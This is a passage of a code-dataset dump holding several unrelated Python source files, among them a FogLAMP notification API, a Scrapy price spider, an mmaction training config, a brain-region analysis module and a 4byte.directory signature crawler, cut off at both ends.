delivery_plugin_config))\n\n if rule_changed: # A new rule has been supplied\n category_desc = rule_plugin_config['plugin']['description']\n category_name = \"rule{}\".format(notif)\n await config_mgr.create_category(category_name=category_name,\n category_description=category_desc,\n 
category_value=rule_plugin_config,\n keep_original_items=False)\n if channel_changed: # A new delivery has been supplied\n category_desc = delivery_plugin_config['plugin']['description']\n category_name = \"delivery{}\".format(notif)\n await config_mgr.create_category(category_name=category_name,\n category_description=category_desc,\n category_value=delivery_plugin_config,\n keep_original_items=False)\n notification_config = {}\n if description is not None:\n notification_config.update({\"description\": description})\n if rule is not None:\n notification_config.update({\"rule\": rule})\n if channel is not None:\n notification_config.update({\"channel\": channel})\n if notification_type is not None:\n notification_config.update({\"notification_type\": notification_type})\n if enabled is not None:\n notification_config.update({\"enable\": is_enabled})\n await _update_configurations(config_mgr, notif, notification_config, rule_config, delivery_config)\n except ValueError as e:\n raise web.HTTPBadRequest(reason=str(e))\n except NotFoundError as e:\n raise web.HTTPNotFound(reason=str(e))\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=str(ex))\n else:\n # TODO: Start notification after update\n return web.json_response({'result': \"Notification {} updated successfully\".format(notif)})\n\n\nasync def delete_notification(request):\n \"\"\" Delete an existing notification\n\n :Example:\n curl -X DELETE http://localhost:8081/foglamp/notification/\n \"\"\"\n try:\n notification_service = ServiceRegistry.get(s_type=ServiceRecord.Type.Notification.name)\n _address, _port = notification_service[0]._address, notification_service[0]._port\n except service_registry_exceptions.DoesNotExist:\n raise web.HTTPNotFound(reason=\"No Notification service available.\")\n\n try:\n notif = request.match_info.get('notification_name', None)\n if notif is None:\n raise ValueError(\"Notification name is required for deletion.\")\n\n # Stop & remove notification\n url = 'http://{}:{}/notification/{}'.format(_address, _port, urllib.parse.quote(notif))\n\n notification = json.loads(await _hit_delete_url(url))\n\n # Removes the child categories for the rule and delivery plugins, Removes the category for the notification itself\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n\n await config_mgr.delete_category_and_children_recursively(notif)\n\n audit = AuditLogger(storage)\n await audit.information('NTFDL', {\"name\": notif})\n except ValueError as ex:\n raise web.HTTPBadRequest(reason=str(ex))\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=str(ex))\n else:\n return web.json_response({'result': 'Notification {} deleted successfully.'.format(notif)})\n\n\nasync def _hit_get_url(get_url, token=None):\n headers = {\"Authorization\": token} if token else None\n try:\n async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:\n async with session.get(get_url, headers=headers) as resp:\n status_code = resp.status\n jdoc = await resp.text()\n if status_code not in range(200, 209):\n _logger.error(\"Error code: %d, reason: %s, details: %s, url: %s\", resp.status, resp.reason, jdoc,\n get_url)\n raise StorageServerError(code=resp.status, reason=resp.reason, error=jdoc)\n except Exception:\n raise\n else:\n return jdoc\n\n\nasync def _hit_post_url(post_url, data=None):\n try:\n async with aiohttp.ClientSession() as session:\n async with session.post(post_url, data=data) as resp:\n status_code = resp.status\n jdoc = 
await resp.text()\n if status_code not in range(200, 209):\n _logger.error(\"Error code: %d, reason: %s, details: %s, url: %s\", resp.status, resp.reason, jdoc,\n post_url)\n raise StorageServerError(code=resp.status, reason=resp.reason, error=jdoc)\n except Exception:\n raise\n else:\n return jdoc\n\n\nasync def _update_configurations(config_mgr, name, notification_config, rule_config, delivery_config):\n try:\n # Update main notification\n if notification_config != {}:\n await config_mgr.update_configuration_item_bulk(name, notification_config)\n # Replace rule configuration\n if rule_config != {}:\n category_name = \"rule{}\".format(name)\n await config_mgr.update_configuration_item_bulk(category_name, rule_config)\n # Replace delivery configuration\n if delivery_config != {}:\n category_name = \"delivery{}\".format(name)\n await config_mgr.update_configuration_item_bulk(category_name, delivery_config)\n except Exception as ex:\n _logger.exception(\"Failed to update notification configuration. %s\", str(ex))\n raise web.HTTPInternalServerError(reason='Failed to update notification configuration. {}'.format(ex))\n\n\nasync def _hit_delete_url(delete_url, data=None):\n try:\n async with aiohttp.ClientSession() as session:\n async with session.delete(delete_url, data=data) as resp:\n status_code = resp.status\n jdoc = await resp.text()\n if status_code not in range(200, 209):\n _logger.error(\"Error code: %d, reason: %s, details: %s, url: %s\",\n resp.status,\n resp.reason,\n jdoc,\n delete_url)\n raise StorageServerError(code=resp.status,\n reason=resp.reason,\n error=jdoc)\n except Exception:\n raise\n else:\n return jdoc\n\n"} {"ext": "py", "sha": "1a2ff9760b7949b5260393f7e1f6e78efb49f42a", "content": "import csv\nimport os\nimport copy\nimport re\n\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse, FormRequest\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.http.cookies import CookieJar\n\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nclass AmazonSpider(BaseSpider):\n name = 'bosch-german-diy-amazon.de'\n allowed_domains = ['amazon.de']\n user_agent = 'spd'\n\n def start_requests(self):\n with open(os.path.join(HERE, 'bosch_german_diy.csv')) as f:\n reader = csv.DictReader(f)\n for row in reader:\n url = row['amazon']\n if url:\n yield Request(url, meta={'sku': row['sku']}, callback=self.parse_product)\n\n def parse(self, response):\n pass\n\n def parse_product(self, response):\n\n hxs = HtmlXPathSelector(response)\n\n loader = ProductLoader(item=Product(), selector=hxs)\n loader.add_value('url', response.url)\n loader.add_xpath('name', u'//div[@class=\"buying\"]/h1[@class=\"parseasinTitle\"]/span[@id=\"btAsinTitle\"]/text()')\n price = hxs.select(u'//div[@class=\"buying\"]/table[@class=\"product\"]//b[@class=\"priceLarge\"]/text()').extract()[0]\n loader.add_value('price', price.replace(',', '.'))\n loader.add_value('sku', response.meta['sku'])\n yield loader.load_item()\n"} {"ext": "py", "sha": "1a2ff98e6dbfbe12703bc881c2266d7e41cc44ee", "content": "# dataset settings\nann_type = 'bast_eval' # * change accordingly\nnum_classes = 9 if ann_type == 'bast_base' else 42\n\n# model settings\nmodel = dict(\n type='Recognizer3D',\n backbone=dict(\n type='ResNet3dSlowOnly',\n depth=50,\n pretrained=None,\n in_channels=17,\n base_channels=32,\n num_stages=3,\n 
out_indices=(2, ),\n stage_blocks=(4, 6, 3),\n conv1_stride_s=1,\n pool1_stride_s=1,\n inflate=(0, 1, 1),\n spatial_strides=(2, 2, 2),\n temporal_strides=(1, 1, 2),\n dilations=(1, 1, 1)),\n cls_head=dict(\n type='I3DHead',\n in_channels=512,\n num_classes=num_classes,\n spatial_type='avg',\n dropout_ratio=0.5),\n train_cfg=dict(),\n test_cfg=dict(average_clips='prob'))\n\n# dataset settings\ndataset_type = 'PoseDataset'\nann_file_train = f'data/skeleton/{ann_type}/bast_train.pkl'\nann_file_val = f'data/skeleton/{ann_type}/bast_val.pkl'\nann_file_test = f'data/skeleton/{ann_type}/bast_test.pkl'\nleft_kp = [1, 3, 5, 7, 9, 11, 13, 15]\nright_kp = [2, 4, 6, 8, 10, 12, 14, 16]\n\ntrain_pipeline = [\n dict(type='UniformSampleFrames', clip_len=54),\n dict(type='PoseDecode'),\n dict(type='PoseCompact', hw_ratio=1., allow_imgpad=True),\n dict(type='Resize', scale=(-1, 64)),\n dict(type='RandomResizedCrop', area_range=(0.56, 1.0)),\n dict(type='Resize', scale=(56, 56), keep_ratio=False),\n dict(type='Flip', flip_ratio=0.5, left_kp=left_kp, right_kp=right_kp),\n dict(\n type='GeneratePoseTarget',\n sigma=0.6,\n use_score=True,\n with_kp=True,\n with_limb=False),\n dict(type='FormatShape', input_format='NCTHW'),\n dict(type='Collect', keys=['imgs', 'label'], meta_keys=[]),\n dict(type='ToTensor', keys=['imgs', 'label'])\n]\nval_pipeline = [\n dict(type='UniformSampleFrames', clip_len=54, num_clips=1, test_mode=True),\n dict(type='PoseDecode'),\n dict(type='PoseCompact', hw_ratio=1., allow_imgpad=True),\n dict(type='Resize', scale=(-1, 64)),\n dict(type='CenterCrop', crop_size=64),\n dict(\n type='GeneratePoseTarget',\n sigma=0.6,\n use_score=True,\n with_kp=True,\n with_limb=False),\n dict(type='FormatShape', input_format='NCTHW'),\n dict(type='Collect', keys=['imgs', 'label'], meta_keys=[]),\n dict(type='ToTensor', keys=['imgs'])\n]\ntest_pipeline = [\n dict(\n type='UniformSampleFrames', clip_len=54, num_clips=10, test_mode=True),\n dict(type='PoseDecode'),\n dict(type='PoseCompact', hw_ratio=1., allow_imgpad=True),\n dict(type='Resize', scale=(-1, 64)),\n dict(type='CenterCrop', crop_size=64),\n dict(\n type='GeneratePoseTarget',\n sigma=0.6,\n use_score=True,\n with_kp=True,\n with_limb=False,\n double=True,\n left_kp=left_kp,\n right_kp=right_kp),\n dict(type='FormatShape', input_format='NCTHW'),\n dict(type='Collect', keys=['imgs', 'label'], meta_keys=[]),\n dict(type='ToTensor', keys=['imgs'])\n]\ndata = dict(\n videos_per_gpu=6,\n workers_per_gpu=1,\n test_dataloader=dict(videos_per_gpu=1),\n train=dict(\n type=dataset_type,\n ann_file=ann_file_train,\n data_prefix='',\n pipeline=train_pipeline),\n val=dict(\n type=dataset_type,\n ann_file=ann_file_val,\n data_prefix='',\n pipeline=val_pipeline),\n test=dict(\n type=dataset_type,\n ann_file=ann_file_test,\n data_prefix='',\n pipeline=test_pipeline))\n\n# optimizer\noptimizer = dict(\n type='SGD', lr=0.0094, momentum=0.9,\n weight_decay=0.0003) # this lr is used for 8 gpus\noptimizer_config = dict(grad_clip=dict(max_norm=40, norm_type=2))\n\n# learning policy\nlr_config = dict(policy='CosineAnnealing', by_epoch=False, min_lr=0)\ntotal_epochs = 280\ncheckpoint_config = dict(interval=10)\nworkflow = [('train', 10)]\nevaluation = dict(\n interval=5,\n metrics=['top_k_accuracy', 'mean_class_accuracy'],\n topk=(1, 2, 3, 4, 5))\neval_config = dict(\n metric_options=dict(\n top_k_accuracy=dict(topk=(1, 2, 3, 4, 5))),)\nlog_config = dict(\n interval=20, hooks=[\n dict(type='TextLoggerHook'),\n ])\n\ndist_params = dict(backend='nccl')\nlog_level = 
'INFO'\nload_from = ('https://download.openmmlab.com/mmaction/skeleton/posec3d/'\n 'slowonly_kinetics400_pretrained_r50_u48_120e_hmdb51_split1_keypoint/'\n 'slowonly_kinetics400_pretrained_r50_u48_120e_hmdb51_split1_keypoint-76ffdd8b.pth')\nresume_from = None\nfind_unused_parameters = False\n"} {"ext": "py", "sha": "1a2ffa3affc0e93e2021cfca989b2e8c5e1909ae", "content": "from lark import Transformer, v_args, Token\nfrom synthesis.synthesizer.dplyr_to_pd.code_analysis.nodes import *\nfrom abc import ABC, abstractmethod\n\n\nclass DplyrTransformer(Transformer):\n \"\"\" Lark built in visitor for grammar construction rules \"\"\"\n\n @v_args(inline=True)\n def identifier_node(self, arg):\n return IdentifierNode(arg)\n\n @v_args(inline=True)\n def single_block_node(self, arg):\n nodes = [arg]\n return BlockNode(nodes)\n\n @v_args(inline=True)\n def block_node(self, arg, other_bock: BlockNode):\n nodes = [arg] + other_bock.lines\n return BlockNode(nodes)\n\n @v_args(inline=True)\n def single_sequence_node(self, arg):\n nodes = [arg]\n return SequenceNode(nodes)\n\n @v_args(inline=True)\n def sequence_node(self, arg, other_seq: SequenceNode):\n nodes = [arg] + other_seq.arguments\n return SequenceNode(nodes)\n\n @v_args(inline=True)\n def function_node(self, name: Token, args: SequenceNode):\n return FunctionNode(str(name), args)\n\n @v_args(inline=True)\n def collapse_function_node(self, arg: Tree, fn: FunctionNode):\n return FunctionNode(str(fn.name), self.sequence_node(arg, fn.arguments))\n\n @v_args(inline=True)\n def predicate_node(self, arg: Token, op: Token, expr: Node, lc: Token, rest: Node):\n visitor = RWriter()\n args = [str(arg), str(op), expr.accept(visitor), str(lc), rest.accept(visitor)]\n return PredicateNode(' '.join(args))\n\n @v_args(inline=True)\n def single_predicate_node(self, arg: Token, op: Token, expr: Node):\n visitor = RWriter()\n args = [str(arg), str(op), expr.accept(visitor)]\n return PredicateNode(' '.join(args))\n\n @v_args(inline=True)\n def empty_node(self):\n return EmptyNode()\n\n @v_args(inline=True)\n def assignment_node(self, lvalue: IdentifierNode, expr: Node):\n return AssignmentNode(lvalue, expr)\n\n @v_args(inline=True)\n def rvalue_node(self, lvalue: IdentifierNode):\n return RValueNode(lvalue)\n\n @v_args(inline=True)\n def literal_node(self, lit: Token):\n return LiteralNode(lit)\n\n @v_args(inline=True)\n def collapse(self, arg):\n return arg\n\n\nclass Visitor(ABC):\n \"\"\"Generic visitor used to the traverse the AST\"\"\"\n\n @abstractmethod\n def visit_block_node(self, sq: BlockNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_function_node(self, fn: FunctionNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_identifier_node(self, ide: IdentifierNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_sequence_node(self, sq: SequenceNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_predicate_node(self, pr: PredicateNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_empty_node(self, pr: EmptyNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_assignment_node(self, an: AssignmentNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_right_value_node(self, rv: RValueNode):\n raise NotImplementedError\n\n @abstractmethod\n def visit_literal_node(self, rv: LiteralNode):\n raise NotImplementedError\n\n\nclass RWriter(Visitor):\n \"\"\"Visitor used to write R\"\"\"\n\n def visit_block_node(self, sq: BlockNode):\n args = []\n for arg in sq.lines:\n args 
+= [arg.accept(self)]\n return '\\n'.join(args)\n\n def visit_function_node(self, fn: FunctionNode):\n return f'{fn.name}({fn.arguments.accept(self)})'\n\n def visit_identifier_node(self, ide: IdentifierNode):\n return ide.name\n\n def visit_sequence_node(self, sq: SequenceNode):\n args = []\n for arg in sq.arguments:\n args += [arg.accept(self)]\n return ', '.join(args)\n\n def visit_predicate_node(self, pr: PredicateNode):\n return pr.predicate\n\n def visit_empty_node(self, pr: EmptyNode):\n return ''\n\n def visit_assignment_node(self, an: AssignmentNode):\n return f'{an.left_value.accept(self)} <- {an.right_value.accept(self)}'\n\n def visit_right_value_node(self, rv: RValueNode):\n return rv.value.accept(self)\n\n def visit_literal_node(self, lit: LiteralNode):\n return lit.value\n\n\nclass DependencyFinder(Visitor):\n \"\"\" For each line find its depedencies on inputs\"\"\"\"\"\n\n def __init__(self, n_inputs: int):\n self.count = 0\n self.left_values = {IdentifierNode(f'input{i+1}'): IdentifierNode(f'input{i+1}') for i in range(n_inputs)}\n self.fn_dependencies = {}\n self.new_assignments = {}\n\n def visit_block_node(self, sq: BlockNode):\n for line in sq.lines:\n line.accept(self)\n return self.fn_dependencies\n\n def visit_function_node(self, fn: FunctionNode):\n result = fn.arguments.accept(self)\n return result\n\n def visit_identifier_node(self, ide: IdentifierNode):\n dep = next(filter(lambda x: x == ide, self.left_values), None)\n if dep is not None:\n return [self.left_values[dep]]\n return []\n\n def visit_sequence_node(self, sq: SequenceNode):\n dependencies = []\n for i in range(len(sq.arguments)):\n if isinstance(sq.arguments[i], FunctionNode) and sq.arguments[i] not in self.new_assignments:\n if sq.arguments[i].accept(self):\n new_id = IdentifierNode(f'tmp_{self.count}')\n an = AssignmentNode(new_id, sq.arguments[i])\n self.count += 1\n self.left_values[an.left_value] = an\n self.new_assignments[sq.children[i]] = new_id\n self.fn_dependencies[an] = an.right_value.accept(self)\n sq.replace_arg(i, new_id)\n dependencies += sq.arguments[i].accept(self)\n return dependencies\n\n def visit_predicate_node(self, pr: PredicateNode):\n return []\n\n def visit_empty_node(self, pr: EmptyNode):\n return []\n\n def visit_assignment_node(self, an: AssignmentNode):\n self.left_values[an.left_value] = an\n self.fn_dependencies[an] = an.right_value.accept(self)\n\n def visit_right_value_node(self, rv: RValueNode):\n return rv.value.accept(self)\n\n def visit_literal_node(self, lit: LiteralNode):\n return []\n"} {"ext": "py", "sha": "1a2ffa6ea157d8f454156833627a835f6464f06e", "content": "import numpy as np\nimport pandas as pd\n\n\nfrom napari.qt.threading import thread_worker\nfrom skimage.measure import regionprops_table\n\nfrom imlib.pandas.misc import initialise_df\nfrom imlib.general.list import unique_elements_lists\n\nfrom brainreg_segment.atlas.utils import lateralise_atlas_image\n\n\n@thread_worker\ndef region_analysis(\n label_layers,\n atlas_layer_image,\n atlas,\n regions_directory,\n output_csv_file=None,\n volumes=True,\n summarise=True,\n):\n regions_directory.mkdir(parents=True, exist_ok=True)\n if volumes:\n print(\"Calculating region volume distribution\")\n print(f\"Saving summary volumes to: {regions_directory}\")\n for label_layer in label_layers:\n analyse_region_brain_areas(\n label_layer,\n atlas_layer_image,\n regions_directory,\n atlas,\n )\n if summarise:\n if output_csv_file is not None:\n print(\"Summarising regions\")\n summarise_brain_regions(\n 
label_layers, output_csv_file, atlas.resolution\n )\n\n print(\"Finished!\\n\")\n\n\ndef summarise_brain_regions(label_layers, filename, atlas_resolution):\n summaries = []\n for label_layer in label_layers:\n summaries.append(summarise_single_brain_region(label_layer))\n\n result = pd.concat(summaries)\n # TODO: use atlas.space to make these more intuitive\n volume_header = \"volume_mm3\"\n length_columns = [\n \"axis_0_min_um\",\n \"axis_1_min_um\",\n \"axis_2_min_um\",\n \"axis_0_max_um\",\n \"axis_1_max_um\",\n \"axis_2_max_um\",\n \"axis_0_center_um\",\n \"axis_1_center_um\",\n \"axis_2_center_um\",\n ]\n\n result.columns = [\"region\"] + [volume_header] + length_columns\n\n voxel_volume_in_mm = np.prod(atlas_resolution) / (1000 ** 3)\n\n result[volume_header] = result[volume_header] * voxel_volume_in_mm\n\n for header in length_columns:\n for dim, idx in enumerate(atlas_resolution):\n if header.startswith(f\"axis_{idx}\"):\n scale = float(dim)\n assert scale > 0\n result[header] = result[header] * scale\n\n result.to_csv(filename, index=False)\n\n\ndef summarise_single_brain_region(\n label_layer,\n ignore_empty=True,\n properties_to_fetch=[\n \"area\",\n \"bbox\",\n \"centroid\",\n ],\n):\n data = label_layer.data\n if ignore_empty:\n if data.sum() == 0:\n return\n\n regions_table = regionprops_table(data, properties=properties_to_fetch)\n df = pd.DataFrame.from_dict(regions_table)\n df.insert(0, \"Region\", label_layer.name)\n return df\n\n\ndef analyse_region_brain_areas(\n label_layer,\n atlas_layer_data,\n destination_directory,\n atlas,\n extension=\".csv\",\n ignore_empty=True,\n):\n \"\"\"\n\n :param label_layer: napari labels layer (with segmented regions)\n\n :param ignore_empty: If True, don't analyse empty regions\n \"\"\"\n\n data = label_layer.data\n if ignore_empty:\n if data.sum() == 0:\n return\n\n name = label_layer.name\n\n masked_annotations = data.astype(bool) * atlas_layer_data\n\n annotations_left, annotations_right = lateralise_atlas_image(\n masked_annotations,\n atlas.hemispheres,\n left_hemisphere_value=atlas.left_hemisphere_value,\n right_hemisphere_value=atlas.right_hemisphere_value,\n )\n\n unique_vals_left, counts_left = np.unique(\n annotations_left, return_counts=True\n )\n unique_vals_right, counts_right = np.unique(\n annotations_right, return_counts=True\n )\n voxel_volume_in_mm = np.prod(atlas.resolution) / (1000 ** 3)\n\n df = initialise_df(\n \"structure_name\",\n \"left_volume_mm3\",\n \"left_percentage_of_total\",\n \"right_volume_mm3\",\n \"right_percentage_of_total\",\n \"total_volume_mm3\",\n \"percentage_of_total\",\n )\n\n sampled_structures = unique_elements_lists(\n list(unique_vals_left) + list(unique_vals_right)\n )\n total_volume_region = get_total_volume_regions(\n unique_vals_left, unique_vals_right, counts_left, counts_right\n )\n\n for atlas_value in sampled_structures:\n if atlas_value != 0:\n try:\n df = add_structure_volume_to_df(\n df,\n atlas_value,\n atlas.structures,\n unique_vals_left,\n unique_vals_right,\n counts_left,\n counts_right,\n voxel_volume_in_mm,\n total_volume_voxels=total_volume_region,\n )\n\n except KeyError:\n print(\n f\"Value: {atlas_value} is not in the atlas structure\"\n f\" reference file. 
Not calculating the volume\"\n )\n filename = destination_directory / (name + extension)\n df.to_csv(filename, index=False)\n\n\ndef get_total_volume_regions(\n unique_vals_left,\n unique_vals_right,\n counts_left,\n counts_right,\n):\n zero_index_left = np.where(unique_vals_left == 0)[0][0]\n counts_left = list(counts_left)\n counts_left.pop(zero_index_left)\n\n zero_index_right = np.where(unique_vals_right == 0)[0][0]\n counts_right = list(counts_right)\n counts_right.pop(zero_index_right)\n\n return sum(counts_left + counts_right)\n\n\ndef add_structure_volume_to_df(\n df,\n atlas_value,\n atlas_structures,\n unique_vals_left,\n unique_vals_right,\n counts_left,\n counts_right,\n voxel_volume,\n total_volume_voxels=None,\n):\n name = atlas_structures[atlas_value][\"name\"]\n\n left_volume, left_percentage = get_volume_in_hemisphere(\n atlas_value,\n unique_vals_left,\n counts_left,\n total_volume_voxels,\n voxel_volume,\n )\n right_volume, right_percentage = get_volume_in_hemisphere(\n atlas_value,\n unique_vals_right,\n counts_right,\n total_volume_voxels,\n voxel_volume,\n )\n if total_volume_voxels is not None:\n total_percentage = left_percentage + right_percentage\n else:\n total_percentage = 0\n\n df = df.append(\n {\n \"structure_name\": name,\n \"left_volume_mm3\": left_volume,\n \"left_percentage_of_total\": left_percentage,\n \"right_volume_mm3\": right_volume,\n \"right_percentage_of_total\": right_percentage,\n \"total_volume_mm3\": left_volume + right_volume,\n \"percentage_of_total\": total_percentage,\n },\n ignore_index=True,\n )\n return df\n\n\ndef get_volume_in_hemisphere(\n atlas_value, unique_vals, counts, total_volume_voxels, voxel_volume\n):\n try:\n index = np.where(unique_vals == atlas_value)[0][0]\n volume = counts[index] * voxel_volume\n if total_volume_voxels is not None:\n percentage = 100 * (counts[index] / total_volume_voxels)\n else:\n percentage = 0\n except IndexError:\n volume = 0\n percentage = 0\n\n return volume, percentage\n"} {"ext": "py", "sha": "1a2ffb7fc92162f5f54956dbe55a174b83ff8a33", "content": "import psycopg2\n\nclass Conn:\n def __init__(self, connstr):\n self.conn = psycopg2.connect(connstr)\n self.setversion()\n self.nexttmp = 0\n \n def setversion(self):\n cur = self.conn.cursor()\n cur.execute(\"select version()\")\n verstr = cur.fetchone()\n if \"Greenplum Database 4\" in verstr[0]:\n self.ver = 4\n elif \"Greenplum Database 5\" in verstr[0]:\n self.ver = 5\n else:\n raise RuntimeError('Unknown Deepgreen Version')\n \n self.typemap = {}\n cur.execute(\"select oid, typname from pg_type\")\n rows = cur.fetchall()\n for row in rows:\n self.typemap[row[0]] = row[1]\n\n cur.close()\n self.conn.commit()\n\n def close(self):\n self.conn.close()\n\n def next_tmpname(self):\n self.nexttmp += 1\n return \"tmp_{0}\".format(self.nexttmp)\n\n def execute(self, sql):\n cur = self.conn.cursor()\n cur.execute(sql) \n rows = cur.fetchall()\n cur.close()\n self.conn.commit()\n return rows\n\n def cursor(self, sql):\n cur = self.conn.cursor()\n cur.execute(sql) \n return cur\n\n\nif __name__ == '__main__':\n conn = Conn(\"host=localhost user=ftian dbname=ftian\")\n print(\"Connected to deepgreen database, version is \", conn.ver)\n\n"} {"ext": "py", "sha": "1a2ffbd7b7c07c33f20999ed51f3d64383f0f858", "content": "import _plotly_utils.basevalidators\n\n\nclass TextsrcValidator(_plotly_utils.basevalidators.SrcValidator):\n def __init__(self, plotly_name=\"textsrc\", parent_name=\"scattermapbox\", **kwargs):\n super(TextsrcValidator, self).__init__(\n 
plotly_name=plotly_name,\n parent_name=parent_name,\n edit_type=kwargs.pop(\"edit_type\", \"none\"),\n **kwargs\n )\n"} {"ext": "py", "sha": "1a2ffbd9964cf66f2b41f80870cc2a60b4cddbce", "content": "\"\"\"\nThe most naive way of computing n15 requires fourteen multiplications:\n\nn × n × ... × n = n15\n\nBut using a \"binary\" method you can compute it in six multiplications:\n\nn × n = n2\nn2 × n2 = n4\nn4 × n4 = n8\nn8 × n4 = n12\nn12 × n2 = n14\nn14 × n = n15\n\nHowever it is yet possible to compute it in only five multiplications:\n\nn × n = n2\nn2 × n = n3\nn3 × n3 = n6\nn6 × n6 = n12\nn12 × n3 = n15\n\nWe shall define m(k) to be the minimum number of multiplications to compute nk; for example m(15) = 5.\n\nFor 1 ≤ k ≤ 200, find ∑ m(k).\n\nans: 1582\n\"\"\"\n\nn = 200\n\nclass Done(Exception):\n\tpass\n\ndef combine(exponents, max_depth, steps):\n\tif exponents[-1] > n or len(exponents) - 1 > max_depth:\n\t\treturn\n\t\n\ttry:\n\t\tsteps[exponents[-1]] = min(steps[exponents[-1]], len(exponents)-1)\n\texcept KeyError:\n\t\tsteps[exponents[-1]] = len(exponents)-1\n\t\tif len(steps) == n:\n\t\t\traise Done\n\t\n\tfor i in range(len(exponents)):\n\t\texp = exponents[i]\n\t\texponents.append(exp + exponents[-1])\n\t\tcombine(exponents, max_depth, steps)\n\t\texponents.pop()\n\nsteps = {1:0}\ntry:\n\tfor depth in range(n): # need to iterate depths in order to stop early in combine()\n\t\tcombine([1], depth, steps)\n\t\t#print(f\"{depth} {len(steps)}\")\nexcept Done:\n\tpass\n\n#print(steps)\nprint(sum(( steps[k] for k in steps )))"} {"ext": "py", "sha": "1a2ffc4dfbbfcd4c40a6f056c0aaac1ff112c9a9", "content": "from typing import Optional\nimport logging\n\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom kermes_infra.models import User\n\n\nclass UserAdapter:\n def __init__(self, endpoint_url: str, table_name: str, logger: logging.Logger) -> None:\n self.dynamodb = boto3.resource(\"dynamodb\", endpoint_url=endpoint_url)\n self.table = self.dynamodb.Table(table_name)\n self.logger = logger\n\n def get(self, user_id: str) -> Optional[User]:\n try:\n item = self.table.get_item(Key={\"user_id\": user_id})\n\n return User.from_dynamo(item[\"Item\"])\n except ClientError:\n self.logger.error(f\"error while getting record from Dynamo: user_id {user_id}\", exc_info=True)\n return None\n\n def put(self, user: User) -> bool:\n try:\n self.table.put_item(Item=user.to_dynamo())\n return True\n except ClientError:\n self.logger.error(\n f\"error while writing record to Dynamo: user_id {user.user_id}\",\n exc_info=True,\n )\n return False\n"} {"ext": "py", "sha": "1a2ffd14bee0c539d2c149abaa4f7937e9156b91", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.paging import Paged\n\n\nclass StorageAccountPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`StorageAccount ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[StorageAccount]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(StorageAccountPaged, self).__init__(*args, **kwargs)\n"} {"ext": "py", "sha": "1a2ffd6458b72da5981d8465dd861600cea84490", "content": "##\n## File: utils.py\n##\n## Author: Schuyler Martin \n##\n## Description: Python file that contains basic utility functions\n##\n\nfrom utils.macros import *\nimport sys\n\n#### GLOBALS ####\n\n#### FUNCTIONS ####\n\ndef printd(msg):\n '''\n Prints debugging messages if debugging is enabled\n :param: msg Message to print\n '''\n if (DEBUG_MACRO):\n print(\"DEBUG: \" + msg)\n\ndef read_file(fd):\n '''\n Reads in the file, line by line\n :param: fd Name of the file\n :return: Contents of the file, as an array of line strings\n '''\n data = []\n for line in open(fd):\n data += [line]\n return data\n\ndef write_file(data, fd):\n '''\n Writes to a file, line by line\n :param: data Lines of the file to write\n :param: fd Name of the file to write\n '''\n fptr = open(fd, 'w')\n for line in data:\n fptr.write(line)\n fptr.close()\n \n"} {"ext": "py", "sha": "1a2ffdce407417f63fd3d58bf33c86816e6173bc", "content": "\"\"\"\nExample script of constant use in Python. Constants should always be\n capitalized to signify their significance. 
Because everything is an object\n in Python and nothing can really be set as private, using visual\n identifiers, such as capitalizing all letters in a name and starting function\n names with an underscore, are important to for script readability.\n\nThis script uses two constants, URL and STATE, and then prints out a string\n using these constants for a state's download url (not a real url and doesn't\n actually download anything).\n\n\"\"\"\n\nURL = 'https://www.statedata.com/'\nSTATE = 'MD'\n\nprint 'Downloading data from {}{}'.format(URL, STATE)\n"} {"ext": "py", "sha": "1a2ffefd93504a899b3ed1bdacedc16dad3774b3", "content": "#!/home/wecode/Documents/Django_Projects/NeighborhoodNews/virtual/bin/python\nfrom django.core import management\n\nif __name__ == \"__main__\":\n management.execute_from_command_line()\n"} {"ext": "py", "sha": "1a2fff6c7fe50c71c5d89283ce05e59433db0a38", "content": "import argparse\nimport sys\nimport time\nfrom typing import Optional, Union\n\nfrom moonstreamdb.db import yield_db_session_ctx\nfrom moonstreamdb.models import ESDEventSignature, ESDFunctionSignature\nfrom sqlalchemy.orm import Session\nimport requests\n\nCRAWL_URLS = {\n \"functions\": \"https://www.4byte.directory/api/v1/signatures/\",\n \"events\": \"https://www.4byte.directory/api/v1/event-signatures/\",\n}\n\nDB_MODELS = {\n \"functions\": ESDFunctionSignature,\n \"events\": ESDEventSignature,\n}\n\n\ndef crawl_step(\n db_session: Session,\n crawl_url: str,\n db_model: Union[ESDEventSignature, ESDFunctionSignature],\n) -> Optional[str]:\n attempt = 0\n current_interval = 2\n success = False\n\n response: Optional[requests.Response] = None\n while (not success) and attempt < 3:\n attempt += 1\n try:\n response = requests.get(crawl_url)\n response.raise_for_status()\n success = True\n except:\n current_interval *= 2\n time.sleep(current_interval)\n\n if response is None:\n print(f\"Could not process URL: {crawl_url}\", file=sys.stderr)\n return None\n\n page = response.json()\n results = page.get(\"results\", [])\n\n rows = [\n db_model(\n id=row.get(\"id\"),\n text_signature=row.get(\"text_signature\"),\n hex_signature=row.get(\"hex_signature\"),\n created_at=row.get(\"created_at\"),\n )\n for row in results\n ]\n 